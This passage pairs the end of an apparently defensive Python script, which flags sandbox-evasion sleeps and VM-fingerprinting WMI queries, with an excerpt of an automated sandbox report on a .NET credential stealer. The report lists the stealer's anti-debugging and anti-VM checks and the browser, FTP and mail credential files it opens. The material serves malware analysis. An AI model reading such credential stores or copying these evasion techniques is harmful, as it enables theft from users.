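Assumptions: raw sleep/delay values are milliseconds; 922337203685477 is
TimeSpan.MaxValue in ms; the VM-fingerprint class list is our own."""
import re
from collections import defaultdict

LONG_SLEEP_MS = 3 * 60 * 1000     # mirrors the report's 'long sleeps (>= 3 min)' signature
INFINITE_SENTINEL_MS = 922337203685477
COUNTDOWN_STEP_MS = 1000          # consecutive waits shrinking by less than this
VM_FINGERPRINT_CLASSES = {        # WMI classes commonly used to spot VMs (assumption)
    "win32_baseboard", "win32_computersystem", "win32_processor",
    "win32_videocontroller", "win32_networkadapter", "win32_bios",
}

# The report fuses fields ('...exeWMI Queries', '5244Thread sleep'), so field
# separators are optional whitespace; a trailing 'Jump to behavior' is link text.
SLEEP_RE = re.compile(r"Source: (?P<src>.+?)\s*TID: (?P<tid>\d+)\s*Thread sleep time: (?P<val>-?\d+)s")
DELAY_RE = re.compile(r"Source: (?P<src>.+?)\s*Thread delayed: delay time: (?P<val>\d+)")
WMI_RE = re.compile(r"Source: (?P<src>.+?)\s*WMI Queries: IWbemServices::(?P<method>\w+) - "
                    r"(?P<ns>\S+) : (?P<query>.+?)\s*(?:Jump to behavior)?$")
CLASS_RE = re.compile(r"Win32_\w+", re.IGNORECASE)


def parse_report(lines):
    """Group behaviour lines by source process: {path: record}."""
    procs = defaultdict(lambda: {"sleeps": [], "delays": [], "threads": set(),
                                 "wmi": [], "vm_classes": set()})
    for raw in lines:
        line = raw.strip()
        m = SLEEP_RE.search(line)
        if m:                                   # Joe prints the relative (negative) wait
            procs[m["src"]]["threads"].add(int(m["tid"]))
            procs[m["src"]]["sleeps"].append(abs(int(m["val"])))
            continue
        m = DELAY_RE.search(line)
        if m:                                   # same events, second report view
            procs[m["src"]]["delays"].append(int(m["val"]))
            continue
        m = WMI_RE.search(line)
        if m:
            p = procs[m["src"]]
            p["wmi"].append((m["method"], m["ns"], m["query"]))
            cls = CLASS_RE.search(m["query"])
            if cls and cls.group(0).lower() in VM_FINGERPRINT_CLASSES:
                p["vm_classes"].add(cls.group(0))
    return dict(procs)


def is_countdown(values, step_ms=COUNTDOWN_STEP_MS, min_len=3):
    """True if min_len consecutive waits each shrink by less than step_ms:
    a loop recomputing remaining = target - elapsed from a wall-clock
    stopwatch, which survives sandboxes that shorten individual Sleep() calls."""
    run = 1
    for prev, cur in zip(values, values[1:]):
        run = run + 1 if 0 < prev - cur < step_ms else 1
        if run >= min_len:
            return True
    return False


def triage(procs):
    """Return {path: [reasons]} for processes showing evasion behaviour."""
    findings = {}
    for src, p in procs.items():
        waits = p["sleeps"] or p["delays"]      # use one view, not both, to avoid double counting
        finite = [v for v in waits if v != INFINITE_SENTINEL_MS]
        long_sleeps = [v for v in finite if v >= LONG_SLEEP_MS]
        reasons = []
        if INFINITE_SENTINEL_MS in waits:
            reasons.append("sleep with TimeSpan.MaxValue sentinel")
        if long_sleeps:
            reasons.append(f"{len(long_sleeps)} sleeps >= 3 min (max {max(long_sleeps) // 60000} min)")
        if is_countdown(finite):
            reasons.append("countdown sleep loop (remaining time re-derived from wall clock)")
        if p["vm_classes"]:
            reasons.append("WMI hardware fingerprinting: " + ", ".join(sorted(p["vm_classes"])))
        if reasons:
            findings[src] = reasons
    return findings


# Constructed sample: a handful of lines copied verbatim from the report above.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 922337203685477Jump to behavior",
    r"Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 600000Jump to behavior",
    r"Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599862Jump to behavior",
    r"Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599734Jump to behavior",
    r"Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard",
    r"Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -597415s >= -30000sJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -597309s >= -30000sJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 5244Thread sleep time: -597188s >= -30000sJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe TID: 1684Thread sleep time: -600000s >= -30000sJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
    r"Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeLast function: Thread delayed",
]

if __name__ == "__main__":
    for src, reasons in triage(parse_report(SAMPLE_LINES)).items():
        print(src)
        for r in reasons:
            print("  -", r)
```

Feed it the full report text (one line per behaviour entry) instead of SAMPLE_LINES to get a per-process summary; the countdown and sentinel checks are the ones that distinguish a deliberately stalling .NET stealer loop from an ordinary long Sleep.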
Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Thread delayed (52 calls), delay times: 922337203685477, 600000, 599862, 599734, 599594, 599468, 599359, 599250, 599140, 599031, 598921, 598812, 598703, 598594, 598481, 598375, 598265, 598156, 598047, 597937, 597828, 597719, 597594, 597478, 597358, 597250, 597116, 597000, 596890, 596781, 596672, 596562, 596453, 596344, 596219, 596109, 596000, 595890, 595781, 595672, 595562, 595453, 595344, 595219, 595109, 595000, 594890, 594781, 594672, 594562, 594452, 594343
Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Thread delayed (53 calls), delay times: 922337203685477, 600000, 599875, 599765, 599656, 599547, 599437, 599328, 599218, 599109, 599000, 598890, 598781, 598666, 598547, 598224, 598078, 597966, 597818, 597702, 597562, 597415, 597309, 597188, 597077, 596953, 596844, 596718, 596609, 596500, 596390, 596281, 596166, 596049, 595922, 595812, 595667, 595547, 595438, 595313, 595188, 595063, 594953, 594844, 594734, 594609, 594500, 594391, 594266, 594155, 594041, 593923, 593811
Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Thread delayed (38 calls), delay times: 922337203685477, 600000, 599891, 599781, 599672, 599563, 599449, 599344, 599234, 599125, 599016, 598907, 598782, 598672, 598563, 598428, 598157, 598018, 597891, 597767, 597641, 597525, 597417, 597297, 597188, 597063, 596954, 596829, 596704, 596579, 596454, 596329, 596204, 596079, 595954, 595829, 595708, 595579
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595454Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595329Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595204Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595079Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594954Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594840Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594719Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593990Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593860Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593735Jump to behavior
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr | Binary or memory string: get_VirtualMachinesRoleSizes
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr | Binary or memory string: virtualMachinesRoleSizes
              Source: OgBoRN.exe, 00000004.00000002.4629529277.000000000799E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware
              Source: OgBoRN.exe, 00000004.00000002.4629529277.000000000799E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr | Binary or memory string: SupportedByVirtualMachines
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr | Binary or memory string: VirtualMachineResourceDiskSizeInMb
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr | Binary or memory string: get_ErrorUpdatingVirtualMachine
              Source: OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VIRTUAL-vmware/VirtualBox0root\CIMV21SELECT * FROM Win32_VideoController2Name3VMware
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr | Binary or memory string: get_ErrorCreatingVirtualMachine
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr | Binary or memory string: set_VirtualMachineResourceDiskSizeInMb
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: DnsDoesNotExistVEnableRemoteDesktop_FriendlyCertificateName<EndPointNotFoundForBlobStorage EndProcessingLogPEnvironmentDoesNotSupportActiveDirectory"EnvironmentExistsLEnvironmentNameDoesntMatchSubscriptionBEnvironmentNameNeedsToBeSpecified:EnvironmentNeedsToBeSpecified&EnvironmentNotFound(EnvironmentsFileName6ErrorCreatingVirtualMachineDErrorRetrievingRuntimesForLocation6ErrorUpdatingVirtualMachine*FailedJobErrorMessage$FilePathIsNotValid2FirstPurchaseErrorMessage(FirstPurchaseMessage,GatewayOperationStatus$GeneralScaffolding.GetAllAddOnsWaitMessage(GetStorageKeysHeader
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr | Binary or memory string: set_SupportedByVirtualMachines
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr | Binary or memory string: ErrorUpdatingVirtualMachine
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr | Binary or memory string: VirtualMachinesRoleSizes
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr | Binary or memory string: ErrorCreatingVirtualMachine
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr | Binary or memory string: get_VirtualMachineResourceDiskSizeInMb
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr | Binary or memory string: set_VirtualMachinesRoleSizes
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CreatedTime&ComputeCapabilities0VirtualMachinesRoleSizes$WebWorkerRoleSizes
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: MemoryInMb2SupportedByWebWorkerRoles4SupportedByVirtualMachines MaxDataDiskCount:WebWorkerResourceDiskSizeInMbDVirtualMachineResourceDiskSizeInMb4CurrentVirtualNetworkSites0CurrentLocalNetworkSites"CurrentDnsServers&ListOperationsAsync
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr | Binary or memory string: get_SupportedByVirtualMachines
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4617984919.0000000006C68000.00000004.00000020.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2399862479.0000000007A29000.00000004.00000020.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4624967654.0000000007800000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Code function: 0_2_03365BE0 CheckRemoteDebuggerPresent
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Process queried: DebugPort
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Process queried: DebugPort
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Process token adjusted: Debug
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Memory allocated: page read and write | page guard
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Queries volume information: C:\Users\user\Desktop\gq8sce-clean.com.com.exe VolumeInformation
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Queries volume information: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Queries volume information: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: 00000003.00000002.2401382417.0000000007D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2401382417.0000000007D17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4629529277.0000000007B64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4629529277.0000000007A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2401382417.0000000007BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: gq8sce-clean.com.com.exe PID: 4668, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: OgBoRN.exe PID: 6656, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: OgBoRN.exe PID: 5588, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: OgBoRN.exe PID: 6656, type: MEMORYSTR
              Source: Yara match | File source: 00000003.00000002.2401382417.0000000007D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: gq8sce-clean.com.com.exe PID: 4668, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: OgBoRN.exe PID: 6656, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: OgBoRN.exe PID: 5588, type: MEMORYSTR
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | File opened: C:\FTP Navigator\Ftplist.txt
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: Yara match | File source: 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4629529277.0000000007A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2401382417.0000000007BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: gq8sce-clean.com.com.exe PID: 4668, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: OgBoRN.exe PID: 6656, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: OgBoRN.exe PID: 5588, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: 00000003.00000002.2401382417.0000000007D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2401382417.0000000007D17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4629529277.0000000007B64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4629529277.0000000007A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2401382417.0000000007BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: gq8sce-clean.com.com.exe PID: 4668, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: OgBoRN.exe PID: 6656, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: OgBoRN.exe PID: 5588, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: OgBoRN.exe PID: 6656, type: MEMORYSTR
              Source: Yara match | File source: 00000003.00000002.2401382417.0000000007D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: gq8sce-clean.com.com.exe PID: 4668, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: OgBoRN.exe PID: 6656, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: OgBoRN.exe PID: 5588, type: MEMORYSTR
              MITRE ATT&CK Matrix (one row per line; a leading number in a cell is the count shown by the report for that technique)

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 231 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 2 Process Injection | 1 Obfuscated Files or Information | 11 Input Capture | 34 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 1 Credentials in Registry | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Masquerading | NTDS | 631 Security Software Discovery | Distributed Component Object Model | 11 Input Capture | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 261 Virtualization/Sandbox Evasion | LSA Secrets | 2 Process Discovery | SSH | 1 Clipboard Data | 15 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Process Injection | Cached Domain Credentials | 261 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
